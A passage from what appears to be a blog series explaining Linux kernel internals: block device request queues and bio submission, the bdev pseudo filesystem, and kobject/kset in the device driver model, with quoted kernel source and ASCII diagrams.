| +-------------------+ | | |
| | | +---------------+ |
| | | | len | |
| | | +---------------+ |
| | | | | +-------+
| | | +---------------+ |
+---------> +-------------------+ <------------+ *part[0] | v
part0 | start_sect | +---------------+ hd_struct
+-------------------+ | *part[1] +----------> +---------------+
| nr_sects | +---------------+ | start_sect |
+-------------------+ +---------------+
| __dev | | nr_sects |
+-------------------+ +---------------+
| partno=0 | | partno=1 |
+-------------------+ +---------------+
| | | |
| | +---------------+
| |
| |
+-------------------+
</code></pre></div></div>
<h3 id="blk_init_queue">blk_init_queue</h3>
<p>A block device needs a queue to hold the data requests coming from the file system, and also a function to handle every request in the queue. There are two methods, called ‘request’ and ‘make request’, for handling this; we first discuss the ‘request’ method.
When using ‘request’, the block device driver allocates a request queue by calling ‘blk_init_queue’. The driver implements a request handler function and passes it to ‘blk_init_queue’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct request_queue *blk_init_queue(request_fn_proc *rfn, spinlock_t *lock)
{
return blk_init_queue_node(rfn, lock, NUMA_NO_NODE);
}
struct request_queue *
blk_init_queue_node(request_fn_proc *rfn, spinlock_t *lock, int node_id)
{
struct request_queue *uninit_q, *q;
uninit_q = blk_alloc_queue_node(GFP_KERNEL, node_id);
if (!uninit_q)
return NULL;
q = blk_init_allocated_queue(uninit_q, rfn, lock);
if (!q)
blk_cleanup_queue(uninit_q);
return q;
}
typedef void (request_fn_proc) (struct request_queue *q);
</code></pre></div></div>
<p>struct ‘request_queue’ represents a request queue. It is a very complicated structure.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
struct request_queue {
/*
* Together with queue_head for cacheline sharing
*/
struct list_head queue_head;
struct request *last_merge;
struct elevator_queue *elevator;
int nr_rqs[2]; /* # allocated [a]sync rqs */
int nr_rqs_elvpriv; /* # allocated rqs w/ elvpriv */
/*
* If blkcg is not used, @q->root_rl serves all requests. If blkcg
* is used, root blkg allocates from @q->root_rl and all other
* blkgs from their own blkg->rl. Which one to use should be
* determined using bio_request_list().
*/
struct request_list root_rl;
request_fn_proc *request_fn;
make_request_fn *make_request_fn;
prep_rq_fn *prep_rq_fn;
unprep_rq_fn *unprep_rq_fn;
merge_bvec_fn *merge_bvec_fn;
softirq_done_fn *softirq_done_fn;
rq_timed_out_fn *rq_timed_out_fn;
dma_drain_needed_fn *dma_drain_needed;
lld_busy_fn *lld_busy_fn;
struct blk_mq_ops *mq_ops;
unsigned int *mq_map;
/* sw queues */
struct blk_mq_ctx *queue_ctx;
unsigned int nr_queues;
/* hw dispatch queues */
struct blk_mq_hw_ctx **queue_hw_ctx;
unsigned int nr_hw_queues;
/*
* Dispatch queue sorting
*/
sector_t end_sector;
struct request *boundary_rq;
/*
* Delayed queue handling
*/
struct delayed_work delay_work;
struct backing_dev_info backing_dev_info;
/*
* The queue owner gets to use this for whatever they like.
* ll_rw_blk doesn't touch it.
*/
void *queuedata;
/*
* various queue flags, see QUEUE_* below
*/
unsigned long queue_flags;
...};
</code></pre></div></div>
<p>‘queue_head’ links all of the requests added to this queue. The list’s element is struct ‘request’, which represents a single request. The kernel will reorder or merge requests for performance.
‘request_fn’ is the request handler function the driver implements. When other subsystems need to read or write data from the block device, the kernel will call this function if the device driver uses the ‘request’ method.
‘make_request_fn’: if the device driver uses ‘blk_init_queue’ to handle requests (the ‘request’ method), the kernel installs the standard function ‘blk_queue_bio’ in this field. If the device driver uses ‘make_request’, it needs to call ‘blk_queue_make_request’ to provide its own implementation for this field. ‘blk_queue_make_request’ doesn’t allocate the request queue, so with the ‘make_request’ method the device driver needs to call ‘blk_alloc_queue’ first to allocate one.
‘queue_flags’ indicates the request queue’s status, for example ‘QUEUE_FLAG_STOPPED’, ‘QUEUE_FLAG_PLUGGED’, ‘QUEUE_FLAG_QUEUED’ and so on.</p>
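<p>‘queue_flags’ is just a bitmask indexed by bit number. A toy userspace model of the set/clear/test helpers (the flag values below are illustrative, not the kernel’s actual QUEUE_FLAG_* numbers, and the real helpers additionally handle locking and atomicity):</p>

```c
#include <assert.h>

/* Illustrative bit numbers only -- not the kernel's real values. */
enum { QFLAG_STOPPED = 1, QFLAG_INIT_DONE = 2 };

static unsigned long queue_flags;

/* Minimal, non-atomic equivalents of queue_flag_set()/clear()/test(). */
void queue_flag_set(int flag)   { queue_flags |= 1UL << flag; }
void queue_flag_clear(int flag) { queue_flags &= ~(1UL << flag); }
int  queue_flag_test(int flag)  { return !!(queue_flags & (1UL << flag)); }
```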
<p>Every request is represented by a struct request.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct request {
union {
struct list_head queuelist;
struct llist_node ll_list;
};
union {
struct call_single_data csd;
struct work_struct mq_flush_data;
};
struct request_queue *q;
struct blk_mq_ctx *mq_ctx;
u64 cmd_flags;
enum rq_cmd_type_bits cmd_type;
unsigned long atomic_flags;
int cpu;
/* the following two fields are internal, NEVER access directly */
unsigned int __data_len; /* total data len */
sector_t __sector; /* sector cursor */
struct bio *bio;
struct bio *biotail;
struct hlist_node hash; /* merge hash */
/*
* The rb_node is only used inside the io scheduler, requests
* are pruned when moved to the dispatch queue. So let the
* completion_data share space with the rb_node.
*/
union {
struct rb_node rb_node; /* sort/lookup */
void *completion_data;
};
/*
* Three pointers are available for the IO schedulers, if they need
* more they have to dynamically allocate it. Flush requests are
* never put on the IO scheduler. So let the flush fields share
* space with the elevator data.
*/
union {
struct {
struct io_cq *icq;
void *priv[2];
} elv;
struct {
unsigned int seq;
struct list_head list;
rq_end_io_fn *saved_end_io;
} flush;
};
struct gendisk *rq_disk;
struct hd_struct *part;
unsigned long start_time;
#ifdef CONFIG_BLK_CGROUP
struct request_list *rl; /* rl this rq is alloced from */
unsigned long long start_time_ns;
unsigned long long io_start_time_ns; /* when passed to hardware */
#endif
/* Number of scatter-gather DMA addr+len pairs after
* physical address coalescing is performed.
*/
unsigned short nr_phys_segments;
#if defined(CONFIG_BLK_DEV_INTEGRITY)
unsigned short nr_integrity_segments;
#endif
unsigned short ioprio;
void *special; /* opaque pointer available for LLD use */
char *buffer; /* kaddr of the current segment if available */
int tag;
int errors;
/*
* when request is used as a packet command carrier
*/
unsigned char __cmd[BLK_MAX_CDB];
unsigned char *cmd;
unsigned short cmd_len;
unsigned int extra_len; /* length of alignment and padding */
unsigned int sense_len;
unsigned int resid_len; /* residual count */
void *sense;
unsigned long deadline;
struct list_head timeout_list;
unsigned int timeout;
int retries;
/*
* completion callback.
*/
rq_end_io_fn *end_io;
void *end_io_data;
/* for bidi */
struct request *next_rq;
};
</code></pre></div></div>
<p>‘queuelist’ links this request into a struct blk_plug.
‘q’ is the request queue this request is attached to.
‘__data_len’ is the total number of bytes this request covers.
‘__sector’ is the start sector.
‘bio’ and ‘biotail’: when a bio is translated or merged into a request, the request links these bios together. If the device driver uses ‘make_request’, it can access these bios in its request handler function.</p>
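<p>The ‘bio’/‘biotail’ pair is a classic head-and-tail singly linked list: keeping a tail pointer makes back-merging a new bio O(1). A simplified sketch (all types here are stand-ins, not the kernel’s structures):</p>

```c
#include <assert.h>
#include <stddef.h>

/* Simplified stand-ins for struct bio and struct request, keeping only
 * the fields needed to show the bio/biotail chaining idea. */
struct bio_s { struct bio_s *bi_next; int sectors; };
struct request_s { struct bio_s *bio, *biotail; int data_len; };

/* Append a bio at the tail of the request's bio chain, as a back
 * merge would, and account its size. */
void back_merge(struct request_s *rq, struct bio_s *b)
{
    b->bi_next = NULL;
    if (rq->biotail)
        rq->biotail->bi_next = b;
    else
        rq->bio = b;
    rq->biotail = b;
    rq->data_len += b->sectors;
}
```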
<p>So let’s look at the ‘blk_init_queue_node’ function. It calls two functions which, as the names indicate, allocate and initialize a queue. ‘blk_alloc_queue_node’ allocates a queue and does some basic initialization; the rest of the initialization work is done in ‘blk_init_allocated_queue’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct request_queue *
blk_init_allocated_queue(struct request_queue *q, request_fn_proc *rfn,
spinlock_t *lock)
{
if (!q)
return NULL;
if (blk_init_rl(&q->root_rl, q, GFP_KERNEL))
return NULL;
q->request_fn = rfn;
q->prep_rq_fn = NULL;
q->unprep_rq_fn = NULL;
q->queue_flags |= QUEUE_FLAG_DEFAULT;
/* Override internal queue lock with supplied lock pointer */
if (lock)
q->queue_lock = lock;
/*
* This also sets hw/phys segments, boundary and size
*/
blk_queue_make_request(q, blk_queue_bio);
q->sg_reserved_size = INT_MAX;
/* Protect q->elevator from elevator_change */
mutex_lock(&q->sysfs_lock);
/* init elevator */
if (elevator_init(q, NULL)) {
mutex_unlock(&q->sysfs_lock);
return NULL;
}
mutex_unlock(&q->sysfs_lock);
return q;
}
</code></pre></div></div>
<p>We can see the assignment of ‘q->request_fn’ and the call to ‘blk_queue_make_request’.
‘blk_queue_bio’ will be used to build new requests and finally calls the driver’s ‘request_fn’ implementation.
Next it calls ‘elevator_init’. The kernel uses an ‘elevator algorithm’ to schedule block requests; ‘elevator_init’ chooses an elevator algorithm for queue ‘q’. We won’t go into the details of which algorithm the kernel uses here.
For now, we just need to know that ‘blk_init_queue’ allocates and initializes a request queue for the block device and chooses a scheduling algorithm.</p>
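<p>The contract of the ‘request’ method can be modeled in a few lines of userspace C: the driver registers a callback at queue setup, and the block core later invokes it to drain the queue. All names with a ‘_sketch’ suffix and the toy fields are my own; the real kernel path involves locks, plugging and the elevator:</p>

```c
#include <assert.h>
#include <stddef.h>

struct queue_s;
typedef void (*request_fn_proc)(struct queue_s *q);

/* Toy request queue: 'pending' stands in for queue_head. */
struct queue_s {
    request_fn_proc request_fn;
    int pending;
    int completed;
};

/* Like blk_init_queue(): remember the driver's handler. */
struct queue_s *blk_init_queue_sketch(struct queue_s *q, request_fn_proc rfn)
{
    q->request_fn = rfn;
    q->pending = q->completed = 0;
    return q;
}

/* Like __blk_run_queue(): hand control to the driver's handler. */
void run_queue(struct queue_s *q) { q->request_fn(q); }

/* A toy driver request_fn that "completes" everything queued. */
void my_request_fn(struct queue_s *q)
{
    q->completed += q->pending;
    q->pending = 0;
}
```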
<p>For the ‘make_request’ method, the device driver first calls ‘blk_alloc_queue’ to allocate a request queue and then calls ‘blk_queue_make_request’ to assign its own make_request implementation to ‘q->make_request_fn’.</p>
<h3 id="submit-requests-to-block-devices">submit requests to block devices</h3>
<p>When the file system needs to read or write data from disk, it sends requests to the device’s request queue; this is done by ‘submit_bio’.
A ‘bio’ contains the request’s details.
When ‘submit_bio’ is called, the struct bio has already been created. Here we don’t care how a bio is created; we just focus on how the block device driver handles it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void submit_bio(int rw, struct bio *bio)
{
bio->bi_rw |= rw;
/*
* If it's a regular read/write or a barrier with data attached,
* go through the normal accounting stuff before submission.
*/
if (bio_has_data(bio)) {
unsigned int count;
if (unlikely(rw & REQ_WRITE_SAME))
count = bdev_logical_block_size(bio->bi_bdev) >> 9;
else
count = bio_sectors(bio);
if (rw & WRITE) {
count_vm_events(PGPGOUT, count);
} else {
task_io_account_read(bio->bi_size);
count_vm_events(PGPGIN, count);
}
if (unlikely(block_dump)) {
char b[BDEVNAME_SIZE];
printk(KERN_DEBUG "%s(%d): %s block %Lu on %s (%u sectors)\n",
current->comm, task_pid_nr(current),
(rw & WRITE) ? "WRITE" : "READ",
(unsigned long long)bio->bi_sector,
bdevname(bio->bi_bdev, b),
count);
}
}
generic_make_request(bio);
}
void generic_make_request(struct bio *bio)
{
struct bio_list bio_list_on_stack;
if (!generic_make_request_checks(bio))
return;
/*
* We only want one ->make_request_fn to be active at a time, else
* stack usage with stacked devices could be a problem. So use
* current->bio_list to keep a list of requests submited by a
* make_request_fn function. current->bio_list is also used as a
* flag to say if generic_make_request is currently active in this
* task or not. If it is NULL, then no make_request is active. If
* it is non-NULL, then a make_request is active, and new requests
* should be added at the tail
*/
if (current->bio_list) {
bio_list_add(current->bio_list, bio);
return;
}
/* following loop may be a bit non-obvious, and so deserves some
* explanation.
* Before entering the loop, bio->bi_next is NULL (as all callers
* ensure that) so we have a list with a single bio.
* We pretend that we have just taken it off a longer list, so
* we assign bio_list to a pointer to the bio_list_on_stack,
* thus initialising the bio_list of new bios to be
* added. ->make_request() may indeed add some more bios
* through a recursive call to generic_make_request. If it
* did, we find a non-NULL value in bio_list and re-enter the loop
* from the top. In this case we really did just take the bio
* of the top of the list (no pretending) and so remove it from
* bio_list, and call into ->make_request() again.
*/
BUG_ON(bio->bi_next);
bio_list_init(&bio_list_on_stack);
current->bio_list = &bio_list_on_stack;
do {
struct request_queue *q = bdev_get_queue(bio->bi_bdev);
q->make_request_fn(q, bio);
bio = bio_list_pop(current->bio_list);
} while (bio);
current->bio_list = NULL; /* deactivate */
}
</code></pre></div></div>
<p>Most of the work is done by ‘generic_make_request’. It first checks whether the current task is already inside generic_make_request; if it is, the new bio is simply added to ‘current->bio_list’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (current->bio_list) {
bio_list_add(current->bio_list, bio);
return;
}
</code></pre></div></div>
<p>Then for every bio, it calls the ‘make_request_fn’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>do {
struct request_queue *q = bdev_get_queue(bio->bi_bdev);
q->make_request_fn(q, bio);
bio = bio_list_pop(current->bio_list);
} while (bio);
</code></pre></div></div>
<p>If the block device driver uses ‘request’, the ‘make_request_fn’ is ‘blk_queue_bio’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void blk_queue_bio(struct request_queue *q, struct bio *bio)
{
const bool sync = !!(bio->bi_rw & REQ_SYNC);
struct blk_plug *plug;
int el_ret, rw_flags, where = ELEVATOR_INSERT_SORT;
struct request *req;
unsigned int request_count = 0;
/*
* low level driver can indicate that it wants pages above a
* certain limit bounced to low memory (ie for highmem, or even
* ISA dma in theory)
*/
blk_queue_bounce(q, &bio);
if (bio_integrity_enabled(bio) && bio_integrity_prep(bio)) {
bio_endio(bio, -EIO);
return;
}
if (bio->bi_rw & (REQ_FLUSH | REQ_FUA)) {
spin_lock_irq(q->queue_lock);
where = ELEVATOR_INSERT_FLUSH;
goto get_rq;
}
/*
* Check if we can merge with the plugged list before grabbing
* any locks.
*/
if (blk_attempt_plug_merge(q, bio, &request_count))
return;
spin_lock_irq(q->queue_lock);
el_ret = elv_merge(q, &req, bio);
if (el_ret == ELEVATOR_BACK_MERGE) {
if (bio_attempt_back_merge(q, req, bio)) {
elv_bio_merged(q, req, bio);
if (!attempt_back_merge(q, req))
elv_merged_request(q, req, el_ret);
goto out_unlock;
}
} else if (el_ret == ELEVATOR_FRONT_MERGE) {
if (bio_attempt_front_merge(q, req, bio)) {
elv_bio_merged(q, req, bio);
if (!attempt_front_merge(q, req))
elv_merged_request(q, req, el_ret);
goto out_unlock;
}
}
get_rq:
/*
* This sync check and mask will be re-done in init_request_from_bio(),
* but we need to set it earlier to expose the sync flag to the
* rq allocator and io schedulers.
*/
rw_flags = bio_data_dir(bio);
if (sync)
rw_flags |= REQ_SYNC;
/*
* Grab a free request. This is might sleep but can not fail.
* Returns with the queue unlocked.
*/
req = get_request(q, rw_flags, bio, GFP_NOIO);
if (unlikely(!req)) {
bio_endio(bio, -ENODEV); /* @q is dead */
goto out_unlock;
}
/*
* After dropping the lock and possibly sleeping here, our request
* may now be mergeable after it had proven unmergeable (above).
* We don't worry about that case for efficiency. It won't happen
* often, and the elevators are able to handle it.
*/
init_request_from_bio(req, bio);
if (test_bit(QUEUE_FLAG_SAME_COMP, &q->queue_flags))
req->cpu = raw_smp_processor_id();
plug = current->plug;
if (plug) {
/*
* If this is the first request added after a plug, fire
* of a plug trace.
*/
if (!request_count)
trace_block_plug(q);
else {
if (request_count >= BLK_MAX_REQUEST_COUNT) {
blk_flush_plug_list(plug, false);
trace_block_plug(q);
}
}
list_add_tail(&req->queuelist, &plug->list);
blk_account_io_start(req, true);
} else {
spin_lock_irq(q->queue_lock);
add_acct_request(q, req, where);
__blk_run_queue(q);
out_unlock:
spin_unlock_irq(q->queue_lock);
}
}
</code></pre></div></div>
<p>‘blk_queue_bio’ reorders or merges the bio with existing requests when it can. If not, it allocates a new request and initializes it from the bio. The requests are processed in ‘__blk_run_queue’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void __blk_run_queue(struct request_queue *q)
{
if (unlikely(blk_queue_stopped(q)))
return;
__blk_run_queue_uncond(q);
}
inline void __blk_run_queue_uncond(struct request_queue *q)
{
if (unlikely(blk_queue_dead(q)))
return;
/*
* Some request_fn implementations, e.g. scsi_request_fn(), unlock
* the queue lock internally. As a result multiple threads may be
* running such a request function concurrently. Keep track of the
* number of active request_fn invocations such that blk_drain_queue()
* can wait until all these request_fn calls have finished.
*/
q->request_fn_active++;
q->request_fn(q);
q->request_fn_active--;
}
</code></pre></div></div>
<p>Here we see it calls the ‘request_fn’ we implemented in the device driver.
Now we can distinguish the ‘request’ and ‘make_request’ methods. When the block device driver uses ‘request’, a bio the file system sends to the block subsystem is processed by ‘blk_queue_bio’, which does a lot of work to optimize the bio, converts bios into requests, and calls the driver’s ‘request_fn’ callback. With the ‘make_request’ method, the driver effectively implements its own ‘blk_queue_bio’, so the bios do not go through the IO scheduler and pass directly to the device driver’s ‘make_request_fn’. The driver’s own ‘make_request_fn’ therefore has to process bios directly, not requests.
Most block device drivers use the ‘request’ method.
So ends this long article; I hope you enjoyed it.</p>
Anatomy of the Linux 'bdev' file system2018-06-14T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/06/14/linux-bdev-file-system
<p>The ‘bdev’ file system holds the inodes of block devices.
This fs is initialized in the function ‘bdev_cache_init’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void __init bdev_cache_init(void)
{
int err;
static struct vfsmount *bd_mnt;
bdev_cachep = kmem_cache_create("bdev_cache", sizeof(struct bdev_inode),
0, (SLAB_HWCACHE_ALIGN|SLAB_RECLAIM_ACCOUNT|
SLAB_MEM_SPREAD|SLAB_PANIC),
init_once);
err = register_filesystem(&bd_type);
if (err)
panic("Cannot register bdev pseudo-fs");
bd_mnt = kern_mount(&bd_type);
if (IS_ERR(bd_mnt))
panic("Cannot create bdev pseudo-fs");
blockdev_superblock = bd_mnt->mnt_sb; /* For writeback */
}
#define kern_mount(type) kern_mount_data(type, NULL)
struct vfsmount *kern_mount_data(struct file_system_type *type, void *data)
{
struct vfsmount *mnt;
mnt = vfs_kern_mount(type, MS_KERNMOUNT, type->name, data);
if (!IS_ERR(mnt)) {
/*
* it is a longterm mount, don't release mnt until
* we unmount before file sys is unregistered
*/
real_mount(mnt)->mnt_ns = MNT_NS_INTERNAL;
}
return mnt;
}
struct vfsmount *
vfs_kern_mount(struct file_system_type *type, int flags, const char *name, void *data)
{
struct mount *mnt;
struct dentry *root;
if (!type)
return ERR_PTR(-ENODEV);
mnt = alloc_vfsmnt(name);
if (!mnt)
return ERR_PTR(-ENOMEM);
if (flags & MS_KERNMOUNT)
mnt->mnt.mnt_flags = MNT_INTERNAL;
root = mount_fs(type, flags, name, data);
if (IS_ERR(root)) {
free_vfsmnt(mnt);
return ERR_CAST(root);
}
mnt->mnt.mnt_root = root;
mnt->mnt.mnt_sb = root->d_sb;
mnt->mnt_mountpoint = mnt->mnt.mnt_root;
mnt->mnt_parent = mnt;
lock_mount_hash();
list_add_tail(&mnt->mnt_instance, &root->d_sb->s_mounts);
unlock_mount_hash();
return &mnt->mnt;
}
</code></pre></div></div>
<p>After registering the ‘bdev’ fs, the initialization function mounts it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct dentry *
mount_fs(struct file_system_type *type, int flags, const char *name, void *data)
{
struct dentry *root;
struct super_block *sb;
char *secdata = NULL;
int error = -ENOMEM;
...
root = type->mount(type, flags, name, data);
if (IS_ERR(root)) {
error = PTR_ERR(root);
goto out_free_secdata;
}
sb = root->d_sb;
BUG_ON(!sb);
WARN_ON(!sb->s_bdi);
WARN_ON(sb->s_bdi == &default_backing_dev_info);
sb->s_flags |= MS_BORN;
...
/*
* filesystems should never set s_maxbytes larger than MAX_LFS_FILESIZE
* but s_maxbytes was an unsigned long long for many releases. Throw
* this warning for a little while to try and catch filesystems that
* violate this rule.
*/
WARN((sb->s_maxbytes < 0), "%s set sb->s_maxbytes to "
"negative value (%lld)\n", type->name, sb->s_maxbytes);
up_write(&sb->s_umount);
free_secdata(secdata);
return root;
out_sb:
dput(root);
deactivate_locked_super(sb);
out_free_secdata:
free_secdata(secdata);
out:
return ERR_PTR(error);
}
</code></pre></div></div>
<p>‘mount_fs’ first calls ‘type->mount’ to get a root dentry. Here type->mount is ‘bd_mount’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct dentry *bd_mount(struct file_system_type *fs_type,
int flags, const char *dev_name, void *data)
{
return mount_pseudo(fs_type, "bdev:", &bdev_sops, NULL, BDEVFS_MAGIC);
}
struct dentry *mount_pseudo(struct file_system_type *fs_type, char *name,
const struct super_operations *ops,
const struct dentry_operations *dops, unsigned long magic)
{
struct super_block *s;
struct dentry *dentry;
struct inode *root;
struct qstr d_name = QSTR_INIT(name, strlen(name));
s = sget(fs_type, NULL, set_anon_super, MS_NOUSER, NULL);
if (IS_ERR(s))
return ERR_CAST(s);
s->s_maxbytes = MAX_LFS_FILESIZE;
s->s_blocksize = PAGE_SIZE;
s->s_blocksize_bits = PAGE_SHIFT;
s->s_magic = magic;
s->s_op = ops ? ops : &simple_super_operations;
s->s_time_gran = 1;
root = new_inode(s);
if (!root)
goto Enomem;
/*
* since this is the first inode, make it number 1. New inodes created
* after this must take care not to collide with it (by passing
* max_reserved of 1 to iunique).
*/
root->i_ino = 1;
root->i_mode = S_IFDIR | S_IRUSR | S_IWUSR;
root->i_atime = root->i_mtime = root->i_ctime = CURRENT_TIME;
dentry = __d_alloc(s, &d_name);
if (!dentry) {
iput(root);
goto Enomem;
}
d_instantiate(dentry, root);
s->s_root = dentry;
s->s_d_op = dops;
s->s_flags |= MS_ACTIVE;
return dget(s->s_root);
Enomem:
deactivate_locked_super(s);
return ERR_PTR(-ENOMEM);
}
</code></pre></div></div>
<p>In ‘mount_pseudo’, we first allocate a super_block, then allocate the root inode and dentry and initialize them. The super_operations for the ‘bdev’ fs is ‘bdev_sops’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const struct super_operations bdev_sops = {
.statfs = simple_statfs,
.alloc_inode = bdev_alloc_inode,
.destroy_inode = bdev_destroy_inode,
.drop_inode = generic_delete_inode,
.evict_inode = bdev_evict_inode,
};
</code></pre></div></div>
<p>Finally the super block in ‘bd_mnt->mnt_sb’ is assigned to the global variable ‘blockdev_superblock’. After ‘bdev’ is registered, the structures look like this.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> super_operations
+--------------+
| |
+--------------|
|bdev_alloc_inode
blockdev_superblock +--------------+
+----------+ | |
| | | |
| | | |
+----------+ | |
| s_op +---------> +--------------+
+----------+
| s_root +---------> +--------------+ inode
+----------+ | | +---------+
| | | |
| | | |
| | | |
+--------------+ | |
| d_inode +-------> +---------+
+--------------+
dentry
</code></pre></div></div>
Anatomy of the Linux device driver model2018-06-10T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/06/10/linux-device-driver-model
<p>Welcome back to the anatomy series of articles; in this one we will talk about the Linux device driver model.</p>
<h2 id="kobject-and-kset">kobject and kset</h2>
<p>kobject and kset are the basis of the device driver model. Every kobject represents a kernel object.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct kobject {
const char *name;
struct list_head entry;
struct kobject *parent;
struct kset *kset;
struct kobj_type *ktype;
struct sysfs_dirent *sd;
struct kref kref;
#ifdef CONFIG_DEBUG_KOBJECT_RELEASE
struct delayed_work release;
#endif
unsigned int state_initialized:1;
unsigned int state_in_sysfs:1;
unsigned int state_add_uevent_sent:1;
unsigned int state_remove_uevent_sent:1;
unsigned int uevent_suppress:1;
};
</code></pre></div></div>
<p>‘name’ is the object’s name and will be shown as a directory in the sysfs file system.
‘parent’ points to the object’s parent; this builds the objects’ hierarchical structure.
‘kset’ can be considered a collection of kobjects of the same kind.
‘ktype’ represents the object’s type; different objects have different types. The kernel uses ‘ktype’ to connect the object with its sysfs file operations and attribute files.
‘sd’ points to the directory entry instance in the sysfs file system.
‘uevent_suppress’ indicates whether the ‘kset’ this object belongs to should suppress sending uevents to userspace.</p>
<p>The ‘kobject_init’ function is used to initialize a kobject.
The ‘kobject_add’ function creates the object hierarchy and also creates a directory in sysfs. This directory lies under ‘parent’ (when parent is not NULL), under the kset’s directory (when parent is NULL but kset is set), or in the sysfs root (when both are NULL).</p>
<h3 id="kobjects-attributes">kobject’s attributes</h3>
<p>There is a kobj_type field in kobject.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct kobj_type {
void (*release)(struct kobject *kobj);
const struct sysfs_ops *sysfs_ops;
struct attribute **default_attrs;
const struct kobj_ns_type_operations *(*child_ns_type)(struct kobject *kobj);
const void *(*namespace)(struct kobject *kobj);
};
struct sysfs_ops {
ssize_t (*show)(struct kobject *, struct attribute *, char *);
ssize_t (*store)(struct kobject *, struct attribute *, const char *, size_t);
};
struct attribute {
const char *name;
umode_t mode;
#ifdef CONFIG_DEBUG_LOCK_ALLOC
bool ignore_lockdep:1;
struct lock_class_key *key;
struct lock_class_key skey;
#endif
};
</code></pre></div></div>
<p>‘default_attrs’ defines the default attributes, and ‘sysfs_ops’ defines the operations that read and write those attributes.</p>
<p>‘sysfs_create_file’ can be used to create an attribute file under a kobject.
When userspace opens a file in sysfs, ‘sysfs_open_file’ is called. It allocates a ‘struct sysfs_open_file’ and calls ‘sysfs_get_open_dirent’; the latter sets</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ((struct seq_file *)file->private_data)->private = data;
</code></pre></div></div>
<p>Later in writing:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static ssize_t sysfs_write_file(struct file *file, const char __user *user_buf,
size_t count, loff_t *ppos)
{
struct sysfs_open_file *of = sysfs_of(file);
ssize_t len = min_t(size_t, count, PAGE_SIZE);
loff_t size = file_inode(file)->i_size;
char *buf;
if (sysfs_is_bin(of->sd) && size) {
if (size <= *ppos)
return 0;
len = min_t(ssize_t, len, size - *ppos);
}
if (!len)
return 0;
buf = kmalloc(len + 1, GFP_KERNEL);
if (!buf)
return -ENOMEM;
if (copy_from_user(buf, user_buf, len)) {
len = -EFAULT;
goto out_free;
}
buf[len] = '\0'; /* guarantee string termination */
len = flush_write_buffer(of, buf, *ppos, len);
if (len > 0)
*ppos += len;
out_free:
kfree(buf);
return len;
}
static struct sysfs_open_file *sysfs_of(struct file *file)
{
return ((struct seq_file *)file->private_data)->private;
}
static int flush_write_buffer(struct sysfs_open_file *of, char *buf, loff_t off,
size_t count)
{
struct kobject *kobj = of->sd->s_parent->s_dir.kobj;
int rc = 0;
const struct sysfs_ops *ops = sysfs_file_ops(of->sd);
rc = ops->store(kobj, of->sd->s_attr.attr, buf, count);
return rc;
}
</code></pre></div></div>
<p>So a write reaches the attribute’s sysfs_ops ‘store’ callback through the ‘sysfs_open_file’ struct ‘of’.</p>
<h3 id="kset">kset</h3>
<p>A kset is a collection of kobjects; it is itself a kernel object, so it embeds a kobject field.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct kset {
struct list_head list;
spinlock_t list_lock;
struct kobject kobj;
const struct kset_uevent_ops *uevent_ops;
};
</code></pre></div></div>
<p>‘list’ links the kobjects belonging to this kset.
‘uevent_ops’ defines some function pointers; when the status of one of the kobjects changes, these functions are called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct kset_uevent_ops {
int (* const filter)(struct kset *kset, struct kobject *kobj);
const char *(* const name)(struct kset *kset, struct kobject *kobj);
int (* const uevent)(struct kset *kset, struct kobject *kobj,
struct kobj_uevent_env *env);
};
</code></pre></div></div>
<p>We can use ‘kset_register’ to register and add a kset to the system.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kset_register(struct kset *k)
{
int err;
if (!k)
return -EINVAL;
kset_init(k);
err = kobject_add_internal(&k->kobj);
if (err)
return err;
kobject_uevent(&k->kobj, KOBJ_ADD);
return 0;
}
</code></pre></div></div>
<p>The only interesting thing is ‘kobject_uevent’; it is used to send an event to userspace saying that something about the kobject has happened, KOBJ_ADD in this example. So if a kobject doesn’t belong to any kset, it can’t send such events to userspace.
Below is the relation between kset and kobject.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kset
+-----------+-----+
uevent_ops<----+ |kobj | |
| | | |
+-----+--+--+-----+
^
|parent
kset |
+--------+--+-----+
uevent_ops<----+ |kobj | |
+ +----+ | | |
| +-----+-----+-----+
list| ^
| |kset
v |
+-----+ +-----+ +-----+
|kobj +---> |kobj +------> |kobj |
| | | | | |
+-----+ +--+--+ +-----+
^
|parent
|
+--+--+
|kobj |
| |
+-----+
</code></pre></div></div>
<h3 id="uevent-and-call_usermodehelper">uevent and call_usermodehelper</h3>
